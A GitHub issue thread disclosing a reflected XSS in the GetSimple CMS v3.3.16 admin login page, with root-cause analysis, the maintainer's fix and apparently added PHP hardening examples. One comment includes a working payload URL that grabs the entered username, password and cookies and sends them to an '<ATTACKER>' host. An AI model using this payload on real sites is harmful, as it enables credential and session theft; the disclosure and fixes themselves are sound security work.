
Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' #1330

Closed
boku7 opened this issue Aug 12, 2020 · 9 comments

Comments

boku7 commented Aug 12, 2020

Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in the 'admin/index.php' login portal webpage allows remote attackers to execute JavaScript code in the client's browser & harvest login credentials via the client clicking a link, entering credentials, and submitting the login form.

boku7 (Author) commented Jan 20, 2021

Any update on this? I signed up and messaged all admins on GS forum and got 1 reply from Shawn.
I sent Shawn the full disclosure of the issue back in August 2020.
I have not received any further replies to my queries.
Thank you

tablatronix (Member):

Not sure I ever got the email, let me check

tablatronix (Member):

Got it, overlooked

tablatronix (Member) commented Jan 20, 2021

Stupid question, mostly a curiosity: do you know WHY it breaks the CSS? I see no reason it should.

http://localhost:8888/dev/getsimple/develop/admin/index.php/asdfasdfasdfasdfasf
Strange behavior, kind of interesting.

tablatronix (Member):

d1e7eb5

@tablatronix tablatronix added this to the 3.3.17 milestone Jan 20, 2021
boku7 (Author) commented Jan 20, 2021

It's your myself(false) function (defined in basic.php) that is echoed into the form action.

[image]

- This easily shows the issue when you assign the result to a variable.

Analysis

- Add a variable to see the result of your echo myself(false) function that is injected into the form action.
- Set a breakpoint on lines 32 & 33 of the /admin/index.php page.

[image]

- Step into the myself function. If false, the result is:
  return htmlentities(basename($_SERVER['PHP_SELF']), ENT_QUOTES);

[image]

- See here that:
  $_SERVER['PHP_SELF'] = "/admin/index.php/breakout"

[image]

- The PHP function basename() "Returns trailing name component of path"

[image]

https://www.php.net/manual/en/function.basename.php

- Since there are no GET arguments sent in the request:
  $_SERVER['QUERY_STRING'] = ""

As a final result, we end up with:
[image]

The above "breakout?" is HTML encoded, but since it's already the action of a form, it will execute JavaScript put there when the form is posted.

The '?' at the end presents some initial complications, but it can be discarded as a comment by adding '//' at the end (URL encoded).

The HTML encoding can also be bypassed, since it's JavaScript: you can just use decodeURIComponent() to get back any character you want to use.

Example Payload to steal username and password:

http://<TARGET>/admin/index.php/index/javascript:var dFslash = "%2f%2f";var username = document.forms[0].elements[0].value;var password = document.forms[0].elements[1].value;var uri = "http:"+decodeURIComponent(dFslash)+"<ATTACKER>?|USER="+username+"|PASS="+password+"|"+document.cookie;xhr = new XMLHttpRequest();xhr.open("GET", uri, true);xhr.send();alert("Welcome "+username+"! Sending your credentails and session to a remote attacker!");window.location.replace("test");%2f%2f
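The mechanism boku7 walks through above, as an added example that is not GetSimple's own code and not part of this thread: it reconstructs the basename(PHP_SELF) plus htmlentities() pattern against a constructed $_SERVER array, and puts a hardened version and a scheme check beside it. The function names myself_vulnerable, myself_hardened and is_safe_relative_action, and the constructed request values, are assumptions; it also assumes SCRIPT_NAME carries no PATH_INFO, as under a typical Apache + mod_php deployment, and needs PHP 8 for str_starts_with().

```php
<?php
// Added example, not GetSimple's code. Reconstructs the pattern described in
// the thread (basename() of PHP_SELF passed through htmlentities()) against a
// constructed $_SERVER, and contrasts it with a hardened form.
// Assumptions: SCRIPT_NAME holds only the script path (no PATH_INFO), as
// under a typical Apache + mod_php setup; helper names are invented here.

declare(strict_types=1);

// Constructed request: the login page requested with extra path info.
$_SERVER['PHP_SELF']     = '/admin/index.php/javascript:alert(1)';
$_SERVER['SCRIPT_NAME']  = '/admin/index.php';
$_SERVER['QUERY_STRING'] = '';

// Reconstruction of the vulnerable pattern: PATH_INFO is part of PHP_SELF,
// basename() keeps whatever follows the last '/', and htmlentities() only
// neutralises HTML metacharacters. A form action is a URL context, so a
// "javascript:" scheme passes through the HTML encoding untouched. The
// trailing '?' matches the "breakout?" result observed in the thread.
function myself_vulnerable(): string
{
    $self = htmlentities(basename($_SERVER['PHP_SELF']), ENT_QUOTES);
    return $self . '?' . htmlentities($_SERVER['QUERY_STRING'], ENT_QUOTES);
}

// Hardened form: derive the name from SCRIPT_NAME rather than PHP_SELF and
// accept only a plain PHP filename; anything else falls back to a fixed value.
function myself_hardened(): string
{
    $name = basename($_SERVER['SCRIPT_NAME']);
    if (preg_match('/^[A-Za-z0-9_.-]+\.php$/', $name) !== 1) {
        $name = 'index.php';
    }
    return htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}

// Defensive check for any value about to land in a URL-valued attribute:
// reject anything carrying a scheme (javascript:, data:, http:) or a
// protocol-relative prefix, so only same-site relative references remain.
function is_safe_relative_action(string $action): bool
{
    if (preg_match('/^[a-z][a-z0-9+.\-]*:/i', $action) === 1) {
        return false; // has a URL scheme
    }
    if (str_starts_with($action, '//')) {
        return false; // protocol-relative URL
    }
    return true;
}

$vuln = myself_vulnerable();
$hard = myself_hardened();
printf("vulnerable action : %s  (safe: %s)\n", $vuln, is_safe_relative_action($vuln) ? 'yes' : 'no');
printf("hardened action   : %s  (safe: %s)\n", $hard, is_safe_relative_action($hard) ? 'yes' : 'no');
```

Run it with `php example.php`. The point to take away is that htmlentities() is the right encoder for the HTML attribute context but says nothing about the URL scheme inside that attribute; the fix is to stop deriving the form action from request-controlled input (PHP_SELF includes PATH_INFO) and, as a second layer, to validate the value before emitting it.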

tablatronix (Member) commented Jan 20, 2021

Yeah, it's already fixed in 3.4; PHP_SELF is all over the place. Added mitigation in 3.3.17, will have to look through the rest for hardcoded ones.

Thanks for the full disclosure, still wondering about the CSS flow breaking.... lol

boku7 (Author) commented Jan 20, 2021

CSS breaks because the page style.php (called by the /admin/index.php login page) used to render the CSS resolves to /admin/index.php, due to how it is included into the /admin/index.php login page via the include of /admin/template/header.php (line 33).

[image]

- See above that the path for the href is relative:
  href="template/style.php?

[image]

- Here you can see in the client browser's DOM that the CSS page resolves to:
  http://localhost/admin/index.php/template/style.php?s=&v=3.3.16

Due to how the routing works for Apache/PHP, this just returns the index.php page again, not the CSS page.
[image]
[image]

Call Chain Analysis

- /admin/index.php calls the get_template() function which exists in /admin/inc/template_functions.php
  [image]

- This includes the template/header.php page
  [image]
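The relative-href resolution boku7 traces above, as an added example that is not GetSimple's own code and not part of this thread: a minimal relative-reference merge shows how the stylesheet link resolves with and without trailing path info on index.php, followed by an absolute href built from the script's directory, which is the fix tablatronix refers to for 3.4. The helper names resolve_relative and asset_href and the constructed URLs are assumptions, and it again assumes SCRIPT_NAME holds the script path without PATH_INFO.

```php
<?php
// Added example, not GetSimple's code. Shows why a relative stylesheet href
// resolves back under index.php when the login page is requested with extra
// path info, and how emitting an absolute path avoids that.
// Assumption: SCRIPT_NAME holds the script path without PATH_INFO.

declare(strict_types=1);

// Minimal relative-reference merge (the "merge paths" step of RFC 3986
// section 5.2.3): keep the document URL up to and including its last '/',
// then append the href. Enough for this thread's case; it does not handle
// "../" segments or absolute references.
function resolve_relative(string $document_url, string $href): string
{
    $query_start = strpos($document_url, '?');
    $doc_path = $query_start === false ? $document_url : substr($document_url, 0, $query_start);
    $base = substr($doc_path, 0, strrpos($doc_path, '/') + 1);
    return $base . $href;
}

// The relative href header.php emits, as quoted in the thread.
$relative_href = 'template/style.php?s=&v=3.3.16';

// A normal request versus one with path info appended to index.php
// (constructed URLs). The browser resolves the same href against each.
$documents = [
    'http://localhost/admin/index.php',
    'http://localhost/admin/index.php/breakout',
];
foreach ($documents as $doc) {
    printf("%-42s -> %s\n", $doc, resolve_relative($doc, $relative_href));
}

// Fix: build the href from the script's own directory so it is absolute
// regardless of any trailing path info in the request. The output is
// HTML-attribute encoded, so '&' appears as '&amp;'.
$_SERVER['SCRIPT_NAME'] = '/admin/index.php'; // constructed
function asset_href(string $relative): string
{
    $dir = rtrim(dirname($_SERVER['SCRIPT_NAME']), '/');
    return htmlspecialchars($dir . '/' . ltrim($relative, '/'), ENT_QUOTES, 'UTF-8');
}
printf("absolute href: %s\n", asset_href('template/style.php?s=&v=3.3.16'));
```

With path info present the base becomes /admin/index.php/, so the stylesheet request lands on index.php again and the login page is served as CSS, which is the broken styling seen in the screenshots; the absolute form resolves to /admin/template/style.php regardless of how index.php was reached.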

tablatronix (Member) commented Jan 20, 2021

doh, thanks! I saw it loading and no network error; all assets in 3.4 are absolute now, except for style.php, that might be a bug!!

Interesting that apache doesn't discard pathing after .php, I never noticed this before.
